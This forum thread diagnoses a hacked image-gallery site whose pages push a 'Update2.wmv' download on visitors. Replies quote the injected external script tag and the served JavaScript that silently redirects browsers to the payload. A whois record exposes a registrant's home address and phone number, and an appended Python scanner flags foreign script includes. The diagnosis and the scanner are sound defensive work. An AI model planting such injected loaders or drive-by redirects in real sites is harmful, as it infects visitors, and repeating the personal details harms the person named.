Weird Download Popup

SandShark (Premium, MVM; join: 2000-05-23; Santa Fe, TX)
Tonight, I was just going to my site to see if it was up because I've been having issues with my site being down a lot lately. I clicked on the link and about three seconds after my site loaded, a Windows download window opened saying I had chosen to download "Update2.wmv" from »server1cuatui.com. Also, and I don't know if this is related, but when I go to my site, in the progress bar at the bottom of my screen, it says "Waiting for www.oldbaldandgrumpy.com" and then quickly switches to "Waiting for domainstat.net" and eventually my site comes up.
Thinking I might have gotten spyware or a virus on that machine, I tried on three other machines: my PowerBook (OS X 10.4.3), my wife's (Windows XP), and my daughter's (Windows XP). On all three, that same file is wanting to be downloaded. I have Avast! v4.6 Antivirus and Windows Firewall on all three Windows machines, and all are connected to a Linksys router, if that helps.
Any ideas what's going on? Thanks. -- BioWillie
Greg_Z (Premium; join: 2001-08-08; Springfield, IL)

Re: Weird Download Popup

I had no problems going to your site www.oldbaldandgrumpy.com. It is possible that if you are using PHP on your site, and have not taken the proper precautions, your server with Hostdime may have gotten infected.
When I went to your site, I did not get the pop-up, and went straight to the site. Also, server1cuatui.com is a Tucows-hosted site.
Result for server1cuatui.com --> fwhois server1cuatui.com@whois.internic.net [whois.internic.net]

  Whois Server Version 1.3
  Domain names in the .com and .net domains can now be registered

  Domain Name: SERVER1CUATUI.COM
  Registrar: TUCOWS INC.
  Whois Server: whois.opensrs.net
  Referral URL: domainhelp.tucows.com
  Name Server: NS1.HOSTSAVE.COM
  Name Server: NS2.HOSTSAVE.COM
  Name Server: NS3.HOSTSAVE.COM
  Status: REGISTRAR-LOCK
  Updated Date: 24-aug-2005
  Creation Date: 24-aug-2005
  Expiration Date: 24-aug-2006

  The Registry database contains ONLY .COM, .NET, .EDU domains and

--> fwhois server1cuatui.com@whois.opensrs.net:whois [whois.opensrs.net]

  Registrant:
    Le, huong
    1240 Arkwood ave
    COLUMBUS, OH 43227
    US

  Domain name: SERVER1CUATUI.COM

  Administrative Contact:
    Le, huong  nivahle@yahoo.com
    1240 Arkwood ave
    COLUMBUS, OH 43227
    US
    +1.6145782634

  Technical Contact:
    Tech, Domain  domaintech@hostsave.com
    3250 W. Commercial Blvd. Suite 200
    Ft. Lauderdale, FL 33309
    US
    +1.9543348000

  Registration Service Provider:
    Affinity Internet, Inc., domainmanager@affinity.com
    954-334-8000
    954-334-8001 (fax)
    This company may be contacted for domain DNS/Nameserver changes,
    and general domain support questions.

  Registrar of Record: TUCOWS, INC.
  Record last updated on 27-Aug-2005.
  Record expires on 24-Aug-2006.
  Record created on 24-Aug-2005.

  Domain servers in listed order:
    NS3.HOSTSAVE.COM  207.150.198.114
    NS1.HOSTSAVE.COM  207.150.196.199
    NS2.HOSTSAVE.COM  207.150.197.103

  Domain status: REGISTRAR-LOCK
-- One man's customer loyalty is another man's misguided arrogance.
sheiny (join: 2005-03-13; Turlock, CA)

Well, you could start by changing the login password on your admin page. Make it a strong one. You need to remove src=****://domainstat.net/stat.php at the top of all your pages, because stat.php downloads update2.wmv. Keep an eye on this thread and you will get better, more comprehensive advice.
SandShark (Premium, MVM; join: 2000-05-23; Santa Fe, TX)

Re: Weird Download Popup

Thanks again. Is there something that makes you think my password isn't strong? It's a combination of 12 letters and numbers. I found the domainstat.net/stat.php entry in several system directory files, but it keeps coming back after I delete it.
Also, can you tell me, specifically, what might have happened? I'm led to believe that someone, perhaps the person mentioned in Greg_Z's whois lookup, has access to and can alter files for my site.
I have no experience or knowledge with PHP or, for that matter, any of the coding that I'm using. Someone in Digital Imaging turned me on to the software; I thought it was simple and easy, and it looked pretty. Other than that, you're "looking" at a dummy when it comes to website security and the vulnerabilities of PHP! -- BioWillie
SandShark (Premium, MVM; join: 2000-05-23; Santa Fe, TX)

Re: Weird Download Popup

Thanks. Far too much research for a simple site to host my images. I'm in the process of taking the site down. I don't want to cause trouble for myself, the hosting company/servers, or anyone else. I appreciate all of the help, though. -- BioWillie
Greg_Z (Premium; join: 2001-08-08; Springfield, IL)

Re: Weird Download Popup

There is this option, which I have had no problems with so far: pics.livejournal.com/ -- One man's customer loyalty is another man's misguided arrogance.
caffeinator (Coming soon to a cup near you..; Premium; join: 2005-01-16; Spokane, WA)

Ok, using Opera 8.51 I tried your website and indeed got that attempt to download the file. On viewing your source code for the page I quickly found the offending code at the top of your pages' code:
  <script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>

That, in turn, goes to a script that does this:

  <!--
  // Script served by domainstat.net/stat.php, reflowed here with comments added
  var currentDate = new Date();
  var adRecurrence = "daily";
  var adId = "a1087804322";          // name of the marker cookie
  var adExpiration = 0;
  var retry=2;
  var flag = 0;
  var obj=null;
  // cookie lifetime: 36 hours from now
  currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
  adExpiration = currentDate.toGMTString();

  function SetCookie(sName, sValue, sExpire){
    var expireCode = "";
    if (sExpire) { expireCode = "expires=" + sExpire + ";" }
    document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
  }

  function GetCookie(sName) {
    var aCookie = document.cookie.split("; ");
    for (var i=0; i < aCookie.length; i++) {
      var aCrumb = aCookie[i].split("=");
      if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
    }
    return null;
  }

  // one second later, navigate the page to the .wmv download
  function upop() { setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'",1000); }

  // only fires when the marker cookie is absent, so the visitor sees it once per 36 hours:
  // set the cookie, then call upop() after 10 seconds
  if (!GetCookie(adId)) {
    SetCookie(adId,"1", adExpiration);
    setTimeout("upop()",10*1000);
  }
  //-->

That's why you are getting the popup.
Remove the Javascript code I first posted from all your header files or whatever other pages that have it. It's been added at the very top, before the normal page starts. Tricky. ;-)
I.E., remove this code:
  <script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>

It's likely in your header files, or your site template. I doubt your host would do it... although some crappy hosts add in code to benefit themselves. More likely one of your permissions is set so someone has edited it themselves, or they hacked your login.
You might try posting this over on your webhost's forums as well, or email them. MG2 has a nice forum as well that has posts about that error msg on your admin login screen ;-).
If I were you, I'd remove the semi-obvious login link for Admin on the MG2 pages as well.. wouldn't be hard to brute-force attack that at all. Also stick a blank .HTML file named index.html in your /includes directory to keep people from seeing your includes... shouldn't be able to see its files IMO.
MG2 is a nice gallery script, I've used it for some time, but the script is meant to be EZ, not secure I'm afraid.
BTW, I'd make sure your website files are backed-up..just in case someone has gotten in and decides to delete it for kicks.
Hope that helps.
CaFF
-- "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." - A. Einstein
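A defender-side check in the spirit of caffeinator's advice: walk the gallery's template files and flag every script include that loads from a host other than the site's own, noting when it sits above the real start of the page. This is an added example, not code from the thread or from MG2; the file contents and host names below are constructed.

```python
"""Flag externally hosted <script src=...> tags in site template files."""
import re
from urllib.parse import urlparse

# <script ... src='...'> with either quote style, case-insensitive
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*['\"]([^'\"]+)['\"][^>]*>", re.IGNORECASE)
PAGE_START = re.compile(r"<!DOCTYPE|<html\b", re.IGNORECASE)


def foreign_scripts(html, own_hosts):
    """Return (src, host, before_page_start) for each script include whose
    host is not one of the site's own. Relative src values count as local."""
    start = PAGE_START.search(html)
    start_pos = start.start() if start else len(html)
    hits = []
    for m in SCRIPT_SRC.finditer(html):
        src = m.group(1)
        host = urlparse(src).hostname
        if host is None:                  # e.g. js/gallery.js
            continue
        if host.lower() in own_hosts:
            continue
        hits.append((src, host.lower(), m.start() < start_pos))
    return hits


def scan_site(files, own_hosts):
    """files: mapping of path -> content. Returns {path: findings} for
    every file that contains at least one foreign include."""
    return {p: f for p, h in files.items() if (f := foreign_scripts(h, own_hosts))}


# Constructed sample files (not real MG2 source); the first mimics the
# injected tag the thread describes, sitting before <!DOCTYPE>.
SAMPLE_FILES = {
    "includes/header.php": (
        "<script language='JavaScript' type='text/javascript' "
        "src='http://domainstat.net/stat.php'></script>\n"
        "<!DOCTYPE html><html><head>\n"
        "<script src=\"http://www.oldbaldandgrumpy.com/js/gallery.js\"></script>\n"
        "</head>"),
    "index.php": "<!DOCTYPE html><html><body><script src='js/local.js'></script></body></html>",
}
OWN_HOSTS = {"www.oldbaldandgrumpy.com", "oldbaldandgrumpy.com"}

if __name__ == "__main__":
    for path, findings in scan_site(SAMPLE_FILES, OWN_HOSTS).items():
        for src, host, early in findings:
            where = "before page start" if early else "inside page"
            print(f"{path}: foreign script {src} ({host}), {where}")
```

Run it against the gallery's real includes directory by loading each file into the mapping; anything reported that you did not put there yourself is the line to remove, and a rescan after the cleanup shows whether it came back.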